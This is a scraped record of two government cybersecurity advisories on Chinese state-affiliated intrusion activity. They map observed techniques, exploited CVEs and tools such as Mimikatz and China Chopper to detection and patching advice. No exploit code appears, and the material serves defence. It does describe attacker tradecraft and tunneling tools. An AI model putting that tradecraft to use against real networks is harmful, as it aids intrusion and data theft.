[[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using commercial cloud storage services for command and control.\n\n * Using malware implants that use the Dropbox\u00ae API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive\u00ae API.\n\n| \n\nUse network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary 
malware.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances, Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. 
\n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). 
Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. 
Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&CK Framework \n\n\n\n_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). 
When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-14T18:34:20", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has consistently observed Chinese Ministry of State Security (MSS)-affiliated cyber threat actors using publicly available information sources and common, well-known tactics, techniques, and procedures (TTPs) to target U.S. Government agencies. CISA has observed these\u2014and other threat actors with varying degrees of skill\u2014routinely using open-source information to plan and execute cyber operations. CISA leveraged the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) and Pre-ATT&CK frameworks to characterize the TTPs used by Chinese MSS-affiliated actors. 
This product was written by CISA with contributions by the Federal Bureau of Investigation (FBI).\n\n### Key Takeaways\n\n * Chinese MSS-affiliated cyber threat actors use open-source information to plan and conduct cyber operations.\n * Chinese MSS-affiliated cyber threat actors use readily available exploits and exploit toolkits to quickly engage target networks.\n * Maintaining a rigorous patching cycle continues to be the best defense against the most frequently used attacks.\n * If critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network.\n * This Advisory identifies some of the more common\u2014yet most effective\u2014TTPs employed by cyber threat actors, including Chinese MSS-affiliated cyber threat actors.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nThrough the operation of the National Cybersecurity Protection System (NCPS) and by fulfilling its mission as the national risk advisor, CISA has observed Chinese MSS-affiliated cyber threat actors operating from the People\u2019s Republic of China using commercially available information sources and open-source exploitation tools to target U.S. Government agency networks.\n\nAccording to a recent U.S. 
Department of Justice indictment, MSS-affiliated actors have targeted various industries across the United States and other countries\u2014including high-tech manufacturing; medical device, civil, and industrial engineering; business, educational, and gaming software; solar energy; pharmaceuticals; and defense\u2014in a campaign that lasted over ten years.[[1](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)] These hackers acted for both their own personal gain and the benefit of the Chinese MSS.[[2](<https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion>)]\n\nAccording to the indictment,\n\n_To conceal the theft of information from victim networks and otherwise evade detection, the defendants typically packaged victim data in encrypted Roshal Archive Compressed files (RAR files), changed RAR file and victim documents\u2019 names and extensions (e.g., from \u201c.rar\u201d to \u201c.jpg\u201d) and system timestamps, and concealed programs and documents at innocuous-seeming locations on victim networks and in victim networks\u2019 \u201crecycle bins.\u201d The defendants frequently returned to re-victimize companies, government entities, and organizations from which they had previously stolen data, in some cases years after the initial successful data theft. In several instances, however, the defendants were unsuccessful in this regard, due to the efforts of the FBI and network defenders._\n\nThe continued use of open-source tools by Chinese MSS-affiliated cyber threat actors highlights that adversaries can use relatively low-complexity capabilities to identify and exploit target networks. In most cases, cyber operations are successful because misconfigurations and immature patch management programs allow actors to plan and execute attacks using existing vulnerabilities and known exploits. 
Widespread implementation of robust configuration and patch management programs would greatly increase network security. It would also reduce the speed and frequency of opportunistic attacks by forcing threat actors to dedicate time and funding to research unknown vulnerabilities and develop custom exploitation tools.\n\n### MITRE PRE-ATT&CK\u00ae Framework for Analysis\n\nIn the last 12 months, CISA analysts have routinely observed Chinese MSS-affiliated actors using the following PRE-ATT&CK\u00ae Framework TTPs.\n\n#### Target Selection and Technical Information Gathering\n\n_Target Selection_ [[TA0014](<https://attack.mitre.org/versions/v7/tactics/TA0014/>)] is a critical part of cyber operations. While cyber threat actors\u2019 motivations and intents are often unknown, they often make their selections based on the target network\u2019s security posture. Threat actors can use information sources such as Shodan, the Common Vulnerabilities and Exposures (CVE) database, and the National Vulnerability Database (NVD).[[3](<https://www.shodan.io/>)][[4](<https://cve.mitre.org/>)][[5](<https://nvd.nist.gov/>)]\n\n * Shodan is an internet search engine that can be used to identify vulnerable devices connected to the internet. Shodan queries can also be customized to discover specific vulnerabilities on devices, which enables sophisticated cyber threat actors to use relatively unsophisticated techniques to execute opportunistic attacks on susceptible targets.\n * The CVE database and the NVD contain detailed information about vulnerabilities in applications, appliances, and operating systems that can be exploited by cyber threat actors if they remain unpatched. These sources also provide risk assessments if any of the recorded vulnerabilities are successfully exploited.\n\nThese information sources have legitimate uses for network defense. 
CISA analysts are able to identify Federal Government systems that may be susceptible to exploitation attempts by using Shodan, the CVE database, and the NVD to enrich NCPS information. Unlike threat actors, CISA takes the necessary actions to notify network owners of their exposure in order to prevent an impending intrusion or quickly identify intrusions as they occur.\n\nWhile using these data sources, CISA analysts have observed a correlation between the public release of a vulnerability and targeted scanning of systems identified as being vulnerable. This correlation suggests that cyber threat actors also rely on Shodan, the CVE database, the NVD, and other open-source information to identify targets of opportunity and plan cyber operations. Together, these data sources provide users with the understanding of a specific vulnerability, as well as a list of systems that may be vulnerable to attempted exploits. These information sources therefore contain invaluable information that can lead cyber threat actors to implement highly effective attacks.\n\nCISA has observed Chinese MSS-affiliated actors using the techniques in table 1 to gather technical information to enable cyber operations against Federal Government networks (_Technical Information Gathering_ [[TA0015](<https://attack.mitre.org/versions/v7/tactics/TA0015/>)]).\n\n_Table 1: Technical information gathering techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1245](<https://attack.mitre.org/versions/v7/techniques/T1245/>)\n\n| \n\nDetermine Approach/Attack Vector\n\n| \n\nThe threat actors narrowed the attack vectors to relatively recent vulnerability disclosures with open-source exploits. 
\n \n[T1247](<https://attack.mitre.org/versions/v7/techniques/T1247/>)\n\n| \n\nAcquire Open Source Intelligence (OSINT) Data Sets and Information\n\n| \n\nCISA observed activity from network proxy service Internet Protocol (IP) addresses to three Federal Government webpages. This activity appeared to enable information gathering activities. \n \n[T1254](<https://attack.mitre.org/versions/v7/techniques/T1254/>)\n\n| \n\nConduct Active Scanning\n\n| \n\nCISA analysts reviewed the network activity of known threat actor IP addresses and found evidence of reconnaissance activity involving virtual security devices. \n \n#### Technical Weakness Identification\n\nCISA analysts consistently observe targeting, scanning, and probing of significant vulnerabilities within days of their emergence and disclosure. This targeting, scanning, and probing frequently leads to compromises at the hands of sophisticated cyber threat actors. In some cases, cyber threat actors have used the same vulnerabilities to compromise multiple organizations across many sectors. Organizations do not appear to be mitigating known vulnerabilities as quickly as cyber threat actors are exploiting them. CISA recently released an alert that highlighted the top 10 vulnerabilities routinely exploited by sophisticated foreign cyber threat actors from 2016 to 2019.[[6](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a >)]\n\nAdditionally, table 2 provides a list of notable compromises by Chinese MSS-affiliated actors within the past 12 months.\n\n_Table 2: Significant CVEs targeted by Chinese MSS-affiliated actors in the last 12 months_\n\nVulnerability\n\n| \n\nObservations \n \n---|--- \n \nCVE-2020-5902: F5 Big-IP Vulnerability\n\n| \n\nCISA has conducted incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2020-5902. 
This is a vulnerability in F5\u2019s Big-IP Traffic Management User Interface that allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code.[[7](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a >)] \n \nCVE-2019-19781: Citrix Virtual Private Network (VPN) Appliances\n\n| \n\nCISA has observed the threat actors attempting to discover vulnerable Citrix VPN Appliances. CVE-2019-19781 enabled the actors to execute directory traversal attacks.[[8](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a >)] \n \nCVE-2019-11510: Pulse Secure VPN Servers\n\n| \n\nCISA has conducted multiple incident response engagements at Federal Government and commercial entities where the threat actors exploited CVE-2019-11510\u2014an arbitrary file reading vulnerability affecting Pulse Secure VPN appliances\u2014to gain access to victim networks. Although Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where compromised Active Directory credentials were used months after the victim organization patched their VPN appliance.[[9](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a >)] \n \nCVE-2020-0688: Microsoft Exchange Server\n\n| \n\nCISA has observed the actors exploiting CVE-2020-0688 for remote code execution to enable email collection of targeted networks. \n \nAdditionally, CISA has observed Chinese MSS-affiliated actors using the techniques listed in table 3 to identify technical weaknesses in Federal Government networks (_Technical Weakness Identification _[[TA0018](<https://attack.mitre.org/versions/v7/tactics/TA0018/>)]). 
\n\n_Table 3: Technical weakness identification techniques observed by CISA_\n\nMITRE ID | Name | Observation\n---|---|---\n[T1288](<https://attack.mitre.org/versions/v7/techniques/T1288/>) | Analyze Architecture and Configuration Posture | CISA observed the cyber actors scanning a Federal Government agency for vulnerable web servers. CISA also observed the threat actors scanning for network appliances vulnerable to CVE-2019-11510.\n[T1291](<https://attack.mitre.org/versions/v7/techniques/T1291/>) | Research Relevant Vulnerabilities | CISA has observed the threat actors conducting scanning and reconnaissance of Federal Government internet-facing systems shortly after the disclosure of significant CVEs.\n\n#### Build Capabilities \n\nCISA analysts have observed cyber threat actors using command and control (C2) infrastructure as part of their cyber operations. These observations also provide evidence that threat actors can build and maintain relatively low-complexity capabilities, such as C2, to enable cyber operations against Federal Government networks (_Build Capabilities_ [[TA0024](<https://attack.mitre.org/versions/v7/tactics/TA0024/>)]). CISA has observed Chinese MSS-affiliated actors using the build capabilities summarized in table 4.\n\n_Table 4: Build capabilities observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1352](<https://attack.mitre.org/versions/v7/techniques/T1352/>)\n\n| \n\nC2 Protocol Development\n\n| \n\nCISA observed beaconing from a Federal Government entity to the threat actors\u2019 C2 server. \n \n[T1328](<https://attack.mitre.org/versions/v7/techniques/T1328/>)\n\n| \n\nBuy Domain Name\n\n| \n\nCISA has observed the use of domains purchased by the threat actors. 
\n \n[T1329](<https://attack.mitre.org/versions/v7/techniques/T1329/>)\n\n| \n\nAcquire and / or use of 3rd Party Infrastructure\n\n| \n\nCISA has observed the threat actors using virtual private servers to conduct cyber operations. \n \n[T1346](<https://attack.mitre.org/versions/v7/techniques/T1346>)\n\n| \n\nObtain/Re-use Payloads\n\n| \n\nCISA has observed the threat actors use and reuse existing capabilities. \n \n[T1349](<https://attack.mitre.org/versions/v7/techniques/T1349>)\n\n| \n\nBuild or Acquire Exploit\n\n| \n\nCISA has observed the threat actors using a variety of open-source and publicly available exploits and exploit code to compromise Federal Government networks. \n \n### MITRE ATT&CK Framework for Analysis\n\nCISA has observed sophisticated cyber threat actors, including Chinese MSS-affiliated actors, using commercial and open-source tools to conduct their operations. For example, threat actors often leverage internet software repositories such as GitHub and Exploit-DB.[[10](<https://www.GitHub.com >)][[11](<https://exploit-db.com >)] Both repositories are commonly used for legitimate development and penetration testing and developing open-source code, but cyber threat actors can also use them to find code to enable nefarious actions.\n\nDuring incident response activities, CISA frequently observed Chinese government-affiliated actors using the open-source tools outlined in table 5.\n\n_Table 5: Common exploit tools CISA observed used by Chinese MSS-affiliated actors_\n\nTool\n\n| \n\nObservations \n \n---|--- \n \n[Cobalt Strike](<https://attack.mitre.org/versions/v7/software/S0154/>)\n\n| \n\nCISA has observed the threat actors using Cobalt Strike to target commercial and Federal Government networks. Cobalt Strike is a commercial penetration testing tool used to conduct red team operations. 
It contains a number of tools that complement the cyber threat actor\u2019s exploitation efforts, such as a keystroke logger, file injection capability, and network services scanners. CISA observed connections from a Federal Government agency to multiple IP addresses possibly hosting Cobalt Strike team servers. \n \n[China Chopper Web Shell](<https://attack.mitre.org/versions/v7/software/S0020/>)\n\n| \n\nCISA has observed the actors successfully deploying China Chopper against organizations\u2019 networks. This open-source tool can be downloaded from internet software repositories such as GitHub and Exploit-DB. China Chopper is a web shell hosted on a web server. It is mainly used for web application attacks, and it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \n \n[Mimikatz](<https://attack.mitre.org/versions/v7/software/S0002/>)\n\n| \n\nCISA has observed the actors using Mimikatz during their operations. 
This open-source tool is used to capture account credentials and perform privilege escalation with pass-the-hash attacks that allow an attacker to pass captured password hashes and authenticate to network devices.[[12](<https://www.varonis.com/blog/what-is-mimikatz/ >)] \n \nThe following sections list the ATT&CK Framework TTPs routinely employed by Chinese government-affiliated actors to conduct cyber operations as observed by CISA analysts.\n\n#### Initial Access \n\nIn the last 12 months, CISA has observed Chinese MSS-affiliated actors use spearphishing emails with embedded links to actor-owned infrastructure and, in some cases, compromise or poison legitimate sites to enable cyber operations.\n\nCISA has observed the threat actors using the _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v7/tactics/TA0001/>)] techniques identified in table 6.\n\n_Table 6: Initial access techniques observed by CISA_\n\n**MITRE ID**\n\n| \n\n**Name**\n\n| \n\n**Observation** \n \n---|---|--- \n \n[T1204.001](<https://attack.mitre.org/versions/v7/techniques/T1204/001/>)\n\n| \n\nUser Execution: Malicious Link\n\n| \n\nCISA has observed indications that users have clicked malicious links embedded in spearphishing emails that the threat actors sent \n \n[T1566.002](<https://attack.mitre.org/versions/v7/techniques/T1566/002>)\n\n| \n\nPhishing: Spearphishing Link\n\n| \n\nCISA analyzed network activity of a Federal Government entity and concluded that the threat actors sent a malicious email weaponized with links. \n \n[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190>)\n\n| \n\nExploit Public-Facing Application\n\n| \n\nCISA has observed the actors leveraging CVE-2019-19781 to compromise Citrix Application Delivery Controllers. 
\n \nCyber threat actors can continue to successfully launch these types of low-complexity attacks\u2014as long as misconfigurations in operational environments and immature patch management programs remain in place\u2014by taking advantage of common vulnerabilities and using readily available exploits and information.\n\n#### Execution \n\nCISA analysts continue to observe beaconing activity indicative of compromise or ongoing access to Federal Government networks. This beaconing is a result of cyber threat actors successfully completing cyber operations that are often designed around emergent vulnerabilities and reliant on existing exploitation tools, as mentioned in this document.\n\nCISA has observed Chinese MSS-affiliated actors using the _Execution _[[TA0002](<https://attack.mitre.org/versions/v7/tactics/TA0002/>)] technique identified in table 7.\n\n_Table 7: Execution technique observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1072](<https://attack.mitre.org/versions/v7/techniques/T1072>)\n\n| \n\nSoftware Deployment Tools\n\n| \n\nCISA observed activity from a Federal Government IP address beaconing out to the threat actors\u2019 C2 server, which is usually an indication of compromise. \n \n#### Credential Access \n\nCyber threat actors also continue to identify large repositories of credentials that are available on the internet to enable brute-force attacks. While this sort of activity is not a direct result of the exploitation of emergent vulnerabilities, it demonstrates that cyber threat actors can effectively use available open-source information to accomplish their goals. 
Further, a threat actor does not require a high degree of competence or sophistication to successfully carry out this kind of opportunistic attack.\n\nCISA has observed Chinese MSS-affiliated actors using the _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v7/tactics/TA0006/>)] techniques highlighted in table 8.\n\n_Table 8: Credential access techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/versions/v7/techniques/T1003/001/>)\n\n| \n\nOperating System (OS) Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory\n\n| \n\nCISA observed the threat actors using Mimikatz in conjunction with coin miner protocols and software. The actors used Mimikatz to dump credentials from the OS using a variety of capabilities resident within the tool. \n \n[T1110.004](<https://attack.mitre.org/versions/v7/techniques/T1110/004>)\n\n| \n\nBrute Force: Credential Stuffing\n\n| \n\nCISA observed what was likely a brute-force attack of a Remote Desktop Protocol on a public-facing server. \n \n#### Discovery \n\nAs with any cyber operation, cyber threat actors must be able to confirm that their target is online and vulnerable\u2014there are a multitude of open-source scanning and reconnaissance tools available to them to use for this purpose. CISA consistently observes scanning activity across federal agencies that is indicative of discovery techniques. 
CISA has observed Chinese MSS-affiliated actors scanning Federal Government traffic using the discovery technique highlighted in table 9 (_Discovery_ [[TA0007](<https://attack.mitre.org/versions/v7/tactics/TA0007/>)]).\n\n_Table 9: Discovery technique observed by CISA_\n\nMITRE ID | Name | Observation\n---|---|---\n[T1046](<https://attack.mitre.org/versions/v7/techniques/T1046/>) | Network Service Scanning | CISA has observed suspicious network scanning activity for various ports at Federal Government entities.\n\n#### Collection \n\nWithin weeks of public disclosure of CVE-2020-0688, CISA analysts identified traffic that was indicative of Chinese MSS-affiliated threat actors attempting to exploit this vulnerability using the _Collection_ [[TA0009](<https://attack.mitre.org/versions/v7/tactics/TA0009/>)] technique listed in table 10.\n\n_Table 10: Collection technique observed by CISA_\n\nMITRE ID | Name | Observation\n---|---|---\n[T1114](<https://attack.mitre.org/versions/v7/techniques/T1114>) | Email Collection | CISA observed the actors targeting CVE-2020-0688 to collect emails from the Exchange servers found in Federal Government environments.\n\n#### Command and Control \n\nCISA analysts often observe cyber threat actors using external proxy tools or hop points to enable their cyber operations while remaining anonymous. These proxy tools may be commercially available infrastructure as a service (IaaS) or software as a service (SaaS) in the form of a web browser promising anonymity on the internet. For example, \u201cThe Onion Router\u201d (Tor) is often used by cyber threat actors for anonymity and C2. Actors carefully choose proxy tools depending on their intended use. 
These techniques are relatively low in complexity and enabled by commercially available tools, yet they are highly effective and often reliant upon existing vulnerabilities and readily available exploits.\n\nCISA has observed Chinese MSS-affiliated actors using the _Command and Control_ [[TA0011](<https://attack.mitre.org/versions/v7/tactics/TA0011/>)] techniques listed in table 11.\n\n_Table 11: Command and control techniques observed by CISA_\n\nMITRE ID\n\n| \n\nName\n\n| \n\nObservation \n \n---|---|--- \n \n[T1090.002](<https://attack.mitre.org/versions/v7/techniques/T1090/002>)\n\n| \n\nProxy: External Proxy\n\n| \n\nCISA observed activity from a network proxy tool to 221 unique Federal Government agency IP addresses. \n \n[T1090.003](<https://attack.mitre.org/versions/v7/techniques/T1090/003>)\n\n| \n\nProxy: Multi-hop Proxy\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n[T1573.002](<https://attack.mitre.org/versions/v7/techniques/T1573/002>)\n\n| \n\nEncrypted Channel: Asymmetric Cryptography\n\n| \n\nCISA observed activity from Tor that has resulted in confirmed compromises of internet-facing Federal Government agency systems. \n \n### Mitigations\n\nCISA asserts with high confidence that sophisticated cyber threat actors will continue to use open-source resources and tools to target networks with a low security posture. When sophisticated cyber threat actors conduct operations against soft targets, it can negatively impact critical infrastructure, federal, and state, local, tribal, territorial government networks, possibly resulting in loss of critical data or personally identifiable information.\n\nCISA and the FBI recommend that organizations place an increased priority on patching the vulnerabilities routinely exploited by MSS-affiliated cyber actors. See table 12 for patch information on the CVEs mentioned in this report. 
For more information on vulnerabilities routinely exploited by sophisticated cyber actors, see [CISA Alert: Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>).\n\n_Table 12: Patch Information for Vulnerabilities Routinely Exploited by MSS-affiliated Cyber Actors_\n\nVulnerability\n\n| \n\nVulnerable Products\n\n| \n\nPatch Information \n \n---|---|--- \n \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n| \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n\n| \n\n * Citrix Application Delivery Controller\n\n * Citrix Gateway\n\n * Citrix SDWAN WANOP\n\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n| \n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 
5.1R15\n\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n\n| \n\n * Microsoft Exchange Servers\n\n| \n\n * [Microsoft Security Advisory: CVE-2020-0688: Microsoft Exchange Validation Key Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) \n \nCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats. Implementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems. \n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto: CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto: 